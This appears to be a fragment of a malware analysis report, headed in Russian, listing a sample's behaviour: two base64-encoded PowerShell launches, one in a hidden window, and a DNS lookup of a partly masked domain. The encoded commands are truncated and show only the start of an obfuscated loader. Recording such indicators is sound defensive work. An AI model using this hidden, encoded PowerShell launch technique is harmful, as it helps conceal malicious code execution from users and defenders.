Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABDAGgAZQBhAGUAZQBiAGwAdQA9ACcATgB4AG4AcgBzAGYAbgBmAHQAYgBsAG4AJwA7ACQATABuAHgAdgBlAG8AcAB5AGoAYwBjAG...
- DNS ASK lo###shomy.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABDAGgAZQBhAGUAZQBiAGwAdQA9ACcATgB4AG4AcgBzAGYAbgBmAHQAYgBsAG4AJwA7ACQATABuAHgAdgBlAG8AcAB5AGoAYwBjAG...' (со скрытым окном)